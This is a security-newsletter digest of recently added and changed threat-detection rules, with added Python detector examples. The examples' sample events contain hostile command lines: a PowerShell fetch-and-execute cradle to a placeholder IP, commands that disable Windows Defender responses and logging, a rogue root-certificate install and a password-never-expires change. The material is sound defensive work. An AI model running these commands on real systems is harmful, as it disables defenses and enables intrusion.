Detections Digest #20250804
This issue highlights key updates from 10 repositories, including 36 new and 97 modified Sigma, Yara, KQL, Elastic and Sublime detection rules.
This week's update highlights the most significant changes to detection rules from 10 of the 40+ monitored GitHub repositories. Between Jul 28 and Aug 4, 2025, contributors added 36 new rules and updated 97 existing ones.
Stay informed about the latest changes in detection engineering to improve your threat detection coverage and operational efficiency.
Key Takeaways
Multiple rules in Sigma and Hayabusa were updated to detect the Invoke-RestMethod cmdlet and its irm alias. This change expands coverage for PowerShell-based payload downloads, C2 communication, and persistence methods. The updates apply to both process creation and script block log events. (SigmaHQ/sigma, Yamato-Security/hayabusa-rules)
Detections for SharePoint exploitation were added across multiple repositories. New rules target webshell creation linked to CVE-2025-49704 and CVE-2025-53770 by monitoring file creation events. A separate Elastic rule finds unusual access to web.config files, another key post-exploitation indicator for these vulnerabilities. (SigmaHQ/sigma, elastic/detection-rules, Yamato-Security/hayabusa-rules)
Phishing detection was expanded with a focus on novel delivery and improved accuracy. New rules from Sublime target callback phishing that uses legitimate services like Microsoft and Signable. Other rules now detect malicious files dropped in Outlook temporary directories and use refined logic for quishing and brand impersonation. (sublime-security/sublime-rules, SigmaHQ/sigma)
The protections-artifacts repository received significant updates for Windows threats. New YARA rules detect the NovaBlight infostealer, Shellter trojan, and multiple Cobalt Strike modules. Numerous behavioral rules for in-memory attacks, including direct syscalls and ROP gadgets, were refined with new exclusions to reduce false positives from legitimate software. (elastic/protections-artifacts)
New rules target adversary attempts to disable endpoint defenses and erase forensic evidence. Hayabusa added multiple detections for blinding Windows Defender via PowerShell, registry edits, and ETW manipulation. Other new detections identify tampering with forensic artifacts like Amcache.hve and the installation of rogue root certificates with certutil. (Yamato-Security/hayabusa-rules, Sergio-Albea-Git/Threat-Hunting-KQL-Queries, anvilogic-forge/armory)
🤖 Put this intel to work
All indicators and detection rules from this digest are available via our MISP and STIX/TAXII feeds.
Pipe them directly into your SIEM, SOAR, or TIP to automate detection and enrichment.
Table Of Contents
SigmaHQ/sigma (+3, ✎14)
sublime-security/sublime-rules (+4, ✎10)
elastic/detection-rules (+7, ✎1)
elastic/protections-artifacts (+2, ✎53)
Yamato-Security/hayabusa-rules (+14, ✎18)
Corporate repositories (8)
SigmaHQ/sigma (+3, ✎14)
+ New rules
Two new rules target adversary persistence on Windows. One detects web shell creation in SharePoint directories, a post-exploitation action following vulnerabilities like CVE-2025-49704. The other identifies the use of wmic.exe to set a user account password to never expire. (Suspicious File Write to SharePoint Layouts Directory, Password Set to Never Expire via WMI)
A new rule detects the opening of malicious attachments from phishing emails. It monitors for the creation of files with high-risk extensions, such as .cpl, .hta, and .iso, within Microsoft Outlook's temporary directories. (Suspicious File Created in Outlook Temporary Directory)
✎ Modified rules
Multiple rules targeting malicious PowerShell activity were updated to detect the Invoke-RestMethod cmdlet and its common alias irm. This change broadens coverage for various adversary techniques, including payload downloads, data exfiltration, persistence via registry run keys, and C2 communication. (Potential DLL File Download Via PowerShell Invoke-WebRequest, Suspicious Invoke-WebRequest Execution With DirectIP, PowerShell Script With File Upload Capabilities, Change User Agents with WebRequest, Suspicious PowerShell In Registry Run Keys, Potential Data Exfiltration Activity Via CommandLine Tools, Usage Of Web Request Commands And Cmdlets - ScriptBlock, Usage Of Web Request Commands And Cmdlets, PowerShell Download and Execution Cradles, Obfuscated IP Download Activity)
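To show what the irm/Invoke-RestMethod change does in practice, here is an added Python example (written for this digest, not code from SigmaHQ/sigma or Hayabusa) that applies the same kind of logic to constructed Sysmon EventID 1 records: it fires only when the image is a PowerShell host, matches the web request cmdlets and aliases as whole words, and adds the direct-IP and DLL-download conditions the listed rules describe. The label names and the sample command lines are this example's own assumptions.

```python
import re

# Constructed Sysmon EventID 1 style records (field names follow Sysmon;
# the values are made up for this example, not captured telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -nop -w hidden -c "irm http://203.0.113.7/a.ps1 | iex"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe",
     "CommandLine": r"powershell_ise.exe -c Invoke-RestMethod https://cdn.example.net/u.dll -OutFile C:\Users\Public\u.dll"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Invoke-WebRequest https://www.microsoft.com/ -UseBasicParsing"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c curl http://203.0.113.7/x"},
]

# powershell_ise.exe is included because several updated rules now treat it as a source process.
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe", "\\powershell_ise.exe")
# Cmdlets and aliases the updated rules look for; Invoke-RestMethod and irm are this week's additions.
WEB_REQUEST_WORDS = {"invoke-webrequest", "iwr", "invoke-restmethod", "irm", "curl", "wget"}
DIRECT_IP_URL = re.compile(r"https?://(?:\d{1,3}\.){3}\d{1,3}")
# Whole-word tokenizer: "irm" must not match inside "confirm" or "firmware".
WORD = re.compile(r"[a-z][\w-]*")


def evaluate(event):
    """Return the labels (assumed names, not the upstream rule titles) that fire on one event."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    if not image.endswith(POWERSHELL_IMAGES):
        return []
    words = set(WORD.findall(cmd))
    if not words & WEB_REQUEST_WORDS:
        return []
    labels = ["web_request_cmdlet"]
    if DIRECT_IP_URL.search(cmd):          # cf. "Suspicious Invoke-WebRequest Execution With DirectIP"
        labels.append("web_request_direct_ip")
    if ".dll" in cmd:                      # cf. "Potential DLL File Download Via PowerShell Invoke-WebRequest"
        labels.append("dll_download")
    return labels


def run(events):
    """Evaluate a batch and keep only the events that produced at least one label."""
    results = []
    for i, e in enumerate(events):
        labels = evaluate(e)
        if labels:
            results.append((i, labels))
    return results


if __name__ == "__main__":
    for i, labels in run(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["CommandLine"], "->", labels)
```

Word-level matching is deliberate: a plain substring test for "irm" would also hit benign command lines containing "confirm", which is the class of false positive a two- or three-letter alias invites. The cmd.exe/curl record is left alone because the listed rules key on PowerShell hosts; a separate curl/wget rule would cover it.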
Detection for SharePoint RCE vulnerability CVE-2025-53770 was improved by targeting more specific malicious filenames, such as spinstall.aspx and debug_dev.js. The logic now requires file creation within known SharePoint installation paths, increasing detection accuracy for post-exploitation activity. (Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create)
Two rules detecting the abuse of tunneling services, ngrok and Visual Studio Code tunnels, were updated for better MITRE ATT&CK framework alignment. Both rules now include mappings to T1572 (Protocol Tunneling) to more accurately categorize this command and control technique. (Process Initiated Network Connection To Ngrok Domain, Network Connection Initiated To Visual Studio Code Tunnels Domain)
The rule for detecting malicious double-extension files was updated to include additional patterns. It now recognizes .svg as a final extension and adds .rtf and .txt as decoy extensions to better identify files disguised as documents or images. (Suspicious Double Extension Files)
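The three file-creation detections in this section (SharePoint LAYOUTS webshells and the ToolShell-specific filenames, high-risk attachments in Outlook's temporary folder, and the extended double-extension patterns) all reduce to path and filename tests on Sysmon EventID 11 records. The Python below is an added example for this digest, not the Sigma rules themselves; it runs those tests over constructed events. The Outlook extension list, the label names and the requirement that the SharePoint writer be w3wp.exe are this example's assumptions.

```python
import re
import ntpath

# Constructed Sysmon EventID 11 (FileCreate) records; paths and names are made up.
SAMPLE_FILE_EVENTS = [
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\spinstall0.aspx"},
    {"Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\Program Files\Common Files\microsoft shared\Web Server Extensions\16\TEMPLATE\LAYOUTS\1033\styles\site.css"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\A1B2C3D4\invoice.iso"},
    {"Image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "TargetFilename": r"C:\Users\bob\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\A1B2C3D4\agenda.docx"},
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "TargetFilename": r"C:\Users\bob\Downloads\Statement_2025.rtf.svg"},
]

WEBSHELL_EXTS = (".aspx", ".ashx", ".asmx", ".php", ".jsp")
# Filenames named in the digest for CVE-2025-53770 post-exploitation (spinstall.aspx, spinstall0.aspx, ..., debug_dev.js).
TOOLSHELL_NAMES = re.compile(r"^(spinstall\d*\.aspx|debug_dev\.js)$")
# Assumed high-risk attachment extensions, modelled on the rule description (.cpl, .hta, .iso, .vbs ...).
OUTLOOK_RISKY_EXTS = (".cpl", ".hta", ".iso", ".img", ".vbs", ".js", ".lnk", ".scr")
# Decoy "document/image" extension followed by an executable/script/svg extension at the very end.
DOUBLE_EXT = re.compile(
    r"\.(pdf|docx?|xlsx?|pptx?|jpe?g|png|gif|rtf|txt)\.(exe|scr|pif|com|bat|cmd|vbs|vbe|js|jse|hta|lnk|svg)$")


def sharepoint_layouts_webshell(event):
    """Webshell-like file written into a SharePoint LAYOUTS directory by the IIS worker process."""
    p = event["TargetFilename"].lower()
    if not event["Image"].lower().endswith("\\w3wp.exe"):
        return None
    if "\\web server extensions\\" not in p or "\\template\\layouts\\" not in p:
        return None
    name = ntpath.basename(p)
    if TOOLSHELL_NAMES.match(name):
        return "toolshell_cve_2025_53770_file"
    if name.endswith(WEBSHELL_EXTS):
        return "sharepoint_layouts_webshell"
    return None


def outlook_temp_attachment(path):
    """High-risk extension created under Outlook's Content.Outlook temporary attachment folder."""
    p = path.lower()
    if "\\content.outlook\\" not in p:
        return None
    return "outlook_temp_risky_attachment" if p.endswith(OUTLOOK_RISKY_EXTS) else None


def double_extension(path):
    """Decoy inner extension such as .rtf or .txt followed by a risky final extension such as .svg."""
    name = ntpath.basename(path.lower())
    return "double_extension" if DOUBLE_EXT.search(name) else None


def evaluate(event):
    path = event["TargetFilename"]
    hits = [sharepoint_layouts_webshell(event), outlook_temp_attachment(path), double_extension(path)]
    return [h for h in hits if h]


if __name__ == "__main__":
    for e in SAMPLE_FILE_EVENTS:
        print(e["TargetFilename"], "->", evaluate(e))
```

ntpath is used so the Windows paths parse correctly when the script runs on a Linux analysis host. The site.css and agenda.docx records are the benign controls: a LAYOUTS write from w3wp.exe or an Outlook temp-folder write is only interesting in combination with the extension, which is what keeps both rules quiet during normal patching and mail handling.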
sublime-security/sublime-rules (+4, ✎10)
+ New rules
Two new rules detect callback phishing attempts delivered through legitimate services. One rule identifies scams sent from Microsoft infrastructure, and another targets fraudulent Signable e-signature requests. Both detections search for specific keywords related to payments or support, alongside a phone number, within the message body. (Callback Phishing via Signable E-Signature Request, Callback Phishing via Microsoftonline comment)
A new rule detects GoDaddy brand impersonation. It analyzes inbound emails for sender display names or domains containing 'godaddy' that do not originate from the official, DMARC-passing 'godaddy.com' domain. (Brand Impersonation: GoDaddy)
A new rule flags inbound emails that contain links to .onion domains. The detection applies to messages from untrusted senders or those that fail DMARC, identifying communications directing users to the Tor anonymization network. (Link: .onion From Unsolicited Sender)
✎ Modified rules
Multiple rules for QR code-based phishing (quishing) were updated. The changes standardize sender reputation analysis to use the specific sender email address for more precise profiling. DMARC validation logic was also hardened across these rules to improve accuracy and prevent evaluation errors. (Attachment: QR code with credential phishing indicators, Link: QR code with phishing disposition in img or pdf, QR Code with suspicious indicators)
Detection for brand impersonation attacks targeting Zoom, Booking.com, and Microsoft was updated. The changes broaden coverage by including new link domains, adding sender display name checks, and using more flexible keyword matching. False positives from Microsoft impersonation are reduced by adding exclusions for newsletters. (Brand Impersonation: Zoom, Brand Impersonation: Booking.com, Brand impersonation: Microsoft)
Several rules targeting specific social engineering tactics were updated. Coverage for HR-themed phishing lures was broadened to include PDFs and additional keywords. Detection for 'secure message' credential phishing now scans the full email thread. Extortion detection was tuned to reduce false positives from trusted senders. (Attachment: Suspicious Employee Policy Update Document Lure, Credential phishing: 'Secure message' and engaging language, Extortion / sextortion (untrusted sender))
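The Sublime additions above are message-level checks: a brand string in the display name or domain that is not backed by the brand's own DMARC-passing domain, a link to a .onion host from a sender that is untrusted or fails DMARC, and payment/support language paired with a phone number for callback phishing. The Python below is an added example for this digest, not Sublime's MQL; it models those three checks over constructed messages. The message field names, keyword list and phone-number pattern are this example's assumptions.

```python
import re

# Constructed message records (not real mail); field names are this example's own.
SAMPLE_MESSAGES = [
    {"from_display": "Microsoft", "from_domain": "microsoftonline.com", "dmarc_pass": True, "sender_trusted": True,
     "body": "Your Geek Squad subscription was renewed for $399.99. To dispute call (888) 555-0142 within 24 hours."},
    {"from_display": "GoDaddy Support", "from_domain": "godaddy-billing.net", "dmarc_pass": True, "sender_trusted": False,
     "body": "Your domain will expire today. Renew at https://godaddy-billing.net/renew"},
    {"from_display": "GoDaddy", "from_domain": "godaddy.com", "dmarc_pass": True, "sender_trusted": True,
     "body": "Your invoice is attached."},
    {"from_display": "Jordan", "from_domain": "example.org", "dmarc_pass": False, "sender_trusted": False,
     "body": "Files here: http://exampleexampleexample.onion/drop"},
    {"from_display": "HR", "from_domain": "example.com", "dmarc_pass": True, "sender_trusted": True,
     "body": "Team lunch at 12, call me on 555-0100 if late."},
]

URL_HOST = re.compile(r"https?://([^\s/]+)", re.I)
# North American style number: optional area code in parentheses, separators optional (assumption).
PHONE = re.compile(r"\(?\b\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4}\b")
CALLBACK_WORDS = ("invoice", "subscription", "renewed", "charged", "payment", "refund", "support", "dispute")


def onion_link(msg):
    """Link to a Tor .onion host; only evaluated for untrusted senders or DMARC failures."""
    if msg["sender_trusted"] and msg["dmarc_pass"]:
        return False
    hosts = (h.lower().split(":")[0] for h in URL_HOST.findall(msg["body"]))
    return any(h.endswith(".onion") for h in hosts)


def godaddy_impersonation(msg):
    """Brand string present, but the mail is not from godaddy.com with a DMARC pass."""
    display, domain = msg["from_display"].lower(), msg["from_domain"].lower()
    mentions_brand = "godaddy" in display or "godaddy" in domain
    legitimate = domain == "godaddy.com" and msg["dmarc_pass"]
    return mentions_brand and not legitimate


def callback_phishing(msg):
    """Payment/support lure that wants the victim to phone a number rather than click a link."""
    body = msg["body"].lower()
    return any(w in body for w in CALLBACK_WORDS) and PHONE.search(body) is not None


def evaluate(msg):
    labels = []
    if callback_phishing(msg):
        labels.append("callback_phishing")
    if godaddy_impersonation(msg):
        labels.append("godaddy_impersonation")
    if onion_link(msg):
        labels.append("onion_link")
    return labels


if __name__ == "__main__":
    for m in SAMPLE_MESSAGES:
        print(m["from_display"], "<", m["from_domain"], ">", "->", evaluate(m))
```

The first message is the point of the callback rules: it comes from legitimate, DMARC-passing Microsoft infrastructure, so sender reputation alone would never flag it and the content pairing (lure words plus a phone number) has to carry the detection. The third message shows the exclusion that keeps the GoDaddy rule from alerting on the brand's own mail.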
elastic/detection-rules (+7, ✎1)
+ New rules
A new set of rules promotes alerts from multiple third-party security platforms into Elastic. These rules query the respective alert indices for SentinelOne, Microsoft Sentinel, Google SecOps, CrowdStrike, Splunk, and Elastic Security itself, centralizing alert triage within the Elastic Security application. (SentinelOne External Alerts, Microsoft Sentinel External Alerts, Google SecOps External Alerts, Elastic Security External Alerts, CrowdStrike External Alerts, Splunk External Alerts)
A new rule detects unusual first-time access to web.config files on Windows within a 7-day window. This behavior is associated with harvesting credentials and configuration data and is linked to CVE-2025-49704, CVE-2025-49706, and CVE-2025-53770. (Unusual Web Config File Access)
✎ Modified rules
Detection for Microsoft Entra ID MFA brute-force attacks is refined. The rule now requires a high count of failed TOTP attempts from at least 10 distinct sessions for a single user, providing a more specific pattern for programmatic attacks. Coverage is expanded by including an additional failure error code (500121). (Microsoft Entra ID MFA TOTP Brute Force Attempts)
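The refinement described here is a counting problem: a user must accumulate many failed TOTP attempts and those failures must come from at least 10 distinct sessions, which separates a script cycling sessions from one person fat-fingering a code. The Python below is an added example for this digest (not Elastic's KQL/ES|QL rule) that applies that aggregation, with a sliding time window, to constructed sign-in records. Only error code 500121, the code the digest names, is treated as an MFA failure; the real rule carries further codes that are not reproduced here, and the thresholds and window are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# 500121 is the Entra sign-in error code the updated rule added. The rule's other failure
# code(s) are not reproduced here (assumption: treat only 500121 as a failed TOTP attempt).
MFA_FAILURE_CODES = {500121}


def build_sample_signins():
    """Constructed Entra sign-in records (not real logs)."""
    t0 = datetime(2025, 8, 1, 9, 0, 0)
    events = []
    # alice: a script cycling 12 sessions, 3 failed TOTP codes each -> should fire
    for s in range(12):
        for k in range(3):
            events.append({"user": "alice@example.com", "session_id": f"alice-{s}",
                           "error_code": 500121, "time": t0 + timedelta(seconds=s * 10 + k)})
    # bob: 40 failures but all from one session -> high count, but not 10 distinct sessions
    for k in range(40):
        events.append({"user": "bob@example.com", "session_id": "bob-0",
                       "error_code": 500121, "time": t0 + timedelta(seconds=k)})
    # carol: two honest mistakes in different sessions
    for k in range(2):
        events.append({"user": "carol@example.com", "session_id": f"carol-{k}",
                       "error_code": 500121, "time": t0 + timedelta(minutes=k)})
    # a successful sign-in is never counted
    events.append({"user": "alice@example.com", "session_id": "alice-ok",
                   "error_code": 0, "time": t0 + timedelta(minutes=5)})
    return events


def totp_brute_force(events, window=timedelta(minutes=10), min_failures=20, min_sessions=10):
    """Return {user: {failures, sessions}} for users meeting both thresholds inside one window.

    Thresholds and window length are this example's assumptions, not the rule's values.
    """
    failures = sorted((e for e in events if e["error_code"] in MFA_FAILURE_CODES), key=lambda e: e["time"])
    by_user = defaultdict(list)
    for e in failures:
        by_user[e["user"]].append(e)

    flagged = {}
    for user, evs in by_user.items():
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it spans at most `window`
            while evs[end]["time"] - evs[start]["time"] > window:
                start += 1
            in_window = evs[start:end + 1]
            sessions = {e["session_id"] for e in in_window}
            if len(in_window) >= min_failures and len(sessions) >= min_sessions:
                flagged[user] = {"failures": len(in_window), "sessions": len(sessions)}
                break  # first window that satisfies both thresholds is enough to alert
    return flagged


if __name__ == "__main__":
    print(totp_brute_force(build_sample_signins()))
```

bob's 40 failures from a single session are the case the distinct-session requirement is meant to exclude: noisy, but not the pattern of a programmatic attack that re-establishes a session for each guess. Tuning note: the session threshold only works if the log source actually populates a stable session identifier; if it is blank, every event looks like its own session and the rule over-fires.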
elastic/protections-artifacts (+2, ✎53)
+ New rules
Two new YARA rules add detection for specific Windows malware families. One rule identifies the NovaBlight infostealer by matching a hardcoded file path and status messages in memory or files. The second rule detects the Windows.Trojan.Shellter by identifying characteristic byte patterns associated with its API hashing and memory manipulation routines. (Windows_Infostealer_NovaBlight_b80703b9, Windows_Trojan_Shellter_89e693fc)
✎ Modified rules
Multiple rules for detecting keylogging and credential access on Windows were updated. These rules monitor for suspicious use of Windows APIs like SetWindowsHookEx, RegisterRawInputDevices, and DirectInput, as well as access to Credential Manager files. The changes primarily add new file hash and path exclusions to reduce false positives from legitimate applications. (Keystrokes Input Capture from Suspicious CallStack, Keystroke Messages Hooking via SetWindowsHookEx, Keystrokes Input Capture from Unsigned DLL, Potential Discovery of Windows Credential Manager Store, Keystroke Input Capture via RegisterRawInputDevices, Keystroke Input Capture via DirectInput)
New and updated YARA rules provide detection for specific malware and offensive tools. Coverage now includes multiple Cobalt Strike modules like its keylogger, UAC bypass, and getsystem functions, with a refinement to a shellcode pattern. Additional rules detect the Camelot cryptominer on Linux and malware signed with known malicious certificates. (Windows_Generic_MalCert_024569d4, Linux_Cryptominer_Camelot_29c1c386, Windows_Trojan_CobaltStrike_1787eef5)
Detection logic for sophisticated in-memory threats on Windows was refined across numerous rules. These rules identify techniques like direct system calls, ROP gadgets, call stack spoofing, shellcode injection from Python or PowerShell, and exception-handler-based injection. Updates focus on adding granular exclusions for call stack patterns, module hashes, and specific API call parameters to improve accuracy. (Execution from Suspicious Stack Trailing Bytes, API Call via Jump ROP Gadget, Direct Syscall from Unsigned Module, Remote Process Injection via Python, Shellcode Injection from Mounted Device, Shellcode Injection via PowerShell, Windows API Call via Indirect Random Syscall, Potential Process Creation via Direct Syscall, Library Loaded From a Potentially Altered Call Stack, Suspicious NTDLL Memory Write, VirtualProtect via Vectored Exception Handling, Suspicious VirtualProtect via Jscript9 from Internet Explorer)
Rules that detect defense evasion by abusing legitimate Windows components were tuned. This includes monitoring for anomalous child processes of the Task Scheduler and WMI, misuse of script interpreters, renamed automation tools, and parent process ID spoofing. Updates also broaden detection for Elastic agent tampering via PendingFileRenameOperations and add exclusions to the rule for HVCI disabling. Most changes filter out benign administrative and software behavior. (Privilege Escalation via EXTENDED STARTUPINFO, Potential Elastic Tampering via PendingFileRename, Suspicious Windows Script Interpreter Child Process, Suspicious Parent-Child Relationship, Disabling Hypervisor-protected Code Integrity via Registry, Script Execution via Microsoft HTML Application, Suspicious Cmd Execution via WMI, Oversized DLL Creation followed by SideLoad, Suspicious Windows Schedule Child Process, Execution via Windows Command Line Debugging Utility, Network Connection via Process with Unusual Arguments, Renamed Windows Automaton Script Interpreter)
Detection for various initial access and execution techniques was improved. This includes updates to rules that find malicious Office documents spawning PowerShell, command execution from IIS web shells, RDP tunneling, and user-tricked execution via Run or browser dialogs. On macOS, detection for large OSA script execution was broadened. Updates primarily add exclusions for legitimate software and system workflows to reduce noise. (Suspicious Command Shell Execution via Windows Run, Potential Remote Desktop Protocol Tunneling, Suspicious Browser Preferences File Modification, PowerShell Obfuscation Spawned via Microsoft Office, Suspicious Microsoft IIS Worker Descendant, Potential Execution via Clickfix Phishing, Unusually large OSA script execution via Shell Command, Potential Decoy Document via User Execution)
anvilogic-forge/armory (+3)
+ New rules
Two new rules detect root certificate installation using certutil.exe. They monitor for the -addstore command-line argument in process creation events, identifying a technique used to subvert trust controls for man-in-the-middle attacks. (Certutil Root Certificate Install, Certutil Root Certificate Install)
A new rule detects the addition of a member to a security-enabled global group in Active Directory. It monitors Windows Event ID 4728 and its legacy pre-Vista equivalent, Event ID 632, to find potential privilege escalation or persistence attempts. (Member added to security-enabled global group)
splunk/security_content (+1)
+ New rules
A new rule detects rundll32.exe loading a DLL from a temporary directory path. This is a common defense evasion technique where adversaries stage payloads. The detection uses Splunk process creation data (Sysmon EventID 1) to find these executions. (Windows Rundll32 Load DLL in Temp Dir)
chainguard-dev/osquery-defense-kit (✎1)
✎ Modified rules
An OSQuery rule that detects potential command-and-control activity by monitoring for anomalous DNS requests was updated to reduce false positives. The change expands an IP-based exclusion for GitHub to a wider CIDR block and adds several common developer and cloud applications to the process name exclusion list. (Catch DNS traffic going to machines other than the host-configured DNS server (event-based))
Yamato-Security/hayabusa-rules (+14, ✎18)
+ New rules
Multiple new rules detect defense evasion techniques that target Windows Defender. Detections cover disabling threat responses via PowerShell's Set-MpPreference or direct registry changes, blinding monitoring by disabling Defender's ETW logging with reg.exe, and impairing manual scans by deleting the product's context menu registry keys. The rules use process creation and registry event telemetry. (PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction', Disabling Windows Defender WMI Autologger Session via Reg.exe, Windows Defender Context Menu Removed, Windows Defender Threat Severity Default Action Modified, PowerShell Defender Threat Severity Default Action Set to 'Allow' or 'NoAction', Windows Defender Context Menu Removed, Disabling Windows Defender WMI Autologger Session via Reg.exe, Delete Defender Scan ShellEx Context Menu Registry Key, Windows Defender Threat Severity Default Action Modified)
Two new rules detect webshell deployment on Microsoft SharePoint servers by monitoring Sysmon file creation events. One rule targets generic webshell extensions like .aspx and .php created by suspicious processes, while the other identifies specific files associated with the exploitation of CVE-2025-53770. (Suspicious File Write to SharePoint Layouts Directory, Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create)
Two new rules detect a persistence technique where an adversary uses the WMIC utility to set a user account's password to never expire. The detection logic is based on monitoring process creation events for wmic.exe with specific command-line arguments. (Password Set to Never Expire via WMI, Password Set to Never Expire via WMI)
A new rule detects potential initial access from malicious email attachments. It monitors Sysmon for the creation of files with high-risk extensions, such as .hta, .iso, or .vbs, in Microsoft Outlook's temporary attachment folders. (Suspicious File Created in Outlook Temporary Directory)
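Several of the process-creation detections in this issue share one shape: a specific image plus a command-line pattern. That covers the certutil -addstore root-store install (anvilogic-forge/armory), rundll32.exe loading a DLL from a Temp path (splunk/security_content), Set-MpPreference threat-action tampering and reg.exe disabling the Defender autologger (Hayabusa, above), and wmic setting PasswordExpires=false (Hayabusa, above). The Python below is an added example written for this digest, not any of those repositories' rule logic; it encodes each pattern as a predicate and runs them over constructed Sysmon EventID 1 records. Label names, the sample command lines and the numeric Set-MpPreference action values are this example's assumptions.

```python
import re

# Constructed Sysmon EventID 1 records; values are made up for this example.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -addstore -f Root C:\Users\Public\proxy-ca.cer"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Users\bob\AppData\Local\Temp\upd.dll,DllRegisterServer"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic useraccount where name='svc_backup' set PasswordExpires=false"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Set-MpPreference -HighThreatDefaultAction Allow -SevereThreatDefaultAction NoAction"},
    {"Image": r"C:\Windows\System32\reg.exe",
     "CommandLine": r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v Start /t REG_DWORD /d 0 /f'},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# Set-MpPreference *ThreatDefaultAction accepts names or numbers; 6 = Allow and 9 = NoAction
# (numeric mapping taken from the Defender cmdlet documentation as this example understands it).
THREAT_ACTION = re.compile(r"-(low|moderate|high|severe)threatdefaultaction\s+(allow|noaction|6|9)\b")


def certutil_root_install(cmd):
    return ("-addstore" in cmd or "/addstore" in cmd) and "root" in cmd.split()


def rundll32_dll_from_temp(cmd):
    return "\\temp\\" in cmd and ".dll" in cmd


def wmic_password_never_expires(cmd):
    return "useraccount" in cmd and re.search(r"passwordexpires\s*=\s*false", cmd) is not None


def defender_threat_action_allow(cmd):
    return "set-mppreference" in cmd and THREAT_ACTION.search(cmd) is not None


def defender_autologger_disabled(cmd):
    # Start=0 on the DefenderApiLogger/DefenderAuditLogger autologger session stops Defender's ETW trace.
    return ("\\wmi\\autologger\\defender" in cmd
            and re.search(r"/v\s+start\b", cmd) is not None
            and re.search(r"/d\s+0\b", cmd) is not None)


# (label, expected image file name, command-line predicate)
CHECKS = [
    ("certutil_root_store_install", "certutil.exe", certutil_root_install),
    ("rundll32_dll_from_temp", "rundll32.exe", rundll32_dll_from_temp),
    ("wmic_password_never_expires", "wmic.exe", wmic_password_never_expires),
    ("defender_threat_action_allow", "powershell.exe", defender_threat_action_allow),
    ("defender_autologger_disabled", "reg.exe", defender_autologger_disabled),
]


def evaluate(event):
    """Return labels whose image and command-line conditions both hold for the event."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "").lower()
    return [label for label, exe, pred in CHECKS if image.endswith("\\" + exe) and pred(cmd)]


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        print(e["CommandLine"], "->", evaluate(e))
```

Pairing the image with the command line is what keeps these cheap: the rundll32 shell32.dll record is a routine Control Panel launch and never reaches the Temp test, and the Set-MpPreference check ignores other PowerShell hosts only because the sample events use powershell.exe, so in production the image list should include pwsh.exe and powershell_ise.exe as the updated Hayabusa rules do. Renamed binaries bypass image-based checks entirely, which is why OriginalFileName-based rules exist alongside these.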
✎ Modified rules
Detection coverage for malicious PowerShell activity is updated across sixteen rules. The primary change adds the Invoke-RestMethod cmdlet and its irm alias to logic that detects download cradles, data exfiltration, persistence, and DLL downloads. Several of these rules also now monitor powershell_ise.exe as a source process. (Suspicious PowerShell In Registry Run Keys, Usage Of Web Request Commands And Cmdlets - ScriptBlock, PowerShell Download and Execution Cradles, Potential DLL File Download Via PowerShell Invoke-WebRequest, Suspicious Invoke-WebRequest Execution With DirectIP, Suspicious Invoke-WebRequest Execution, Change User Agents with WebRequest, PowerShell Script With File Upload Capabilities, Potential Data Exfiltration Activity Via CommandLine Tools, Obfuscated IP Download Activity, Usage Of Web Request Commands And Cmdlets, PowerShell Download and Execution Cradles, Potential DLL File Download Via PowerShell Invoke-WebRequest, Obfuscated IP Download Activity, Suspicious Invoke-WebRequest Execution With DirectIP, Potential Data Exfiltration Activity Via CommandLine Tools)
Detection for malicious files disguised with double extensions is updated. The rule now identifies .svg as a final extension and adds .rtf and .txt as deceptive inner extensions, in response to recent phishing campaigns. (Suspicious Double Extension Files)
The rule for detecting malicious use of Visual Studio Code remote tunnels received updated MITRE ATT&CK mappings. The change adds classifications for Command and Control (TA0011) and Protocol Tunneling (T1572), providing better context for alerts about this exfiltration and C2 technique. (Network Connection Initiated To Visual Studio Code Tunnels Domain)
Personal repositories (2)
Sergio-Albea-Git/Threat-Hunting-KQL-Queries (+1)
+ New rules
A new rule detects defense evasion attempts through the modification or deletion of Windows forensic artifacts. It monitors file events targeting Amcache.hve and the SYSTEM hive, which contain program and execution history, to identify adversaries trying to erase their tracks from a system. (Detect Attempts to modify Amcache.hve or SYSTEM files)
Cloud-Architekt/AzureSentinel (+1)
+ New rules
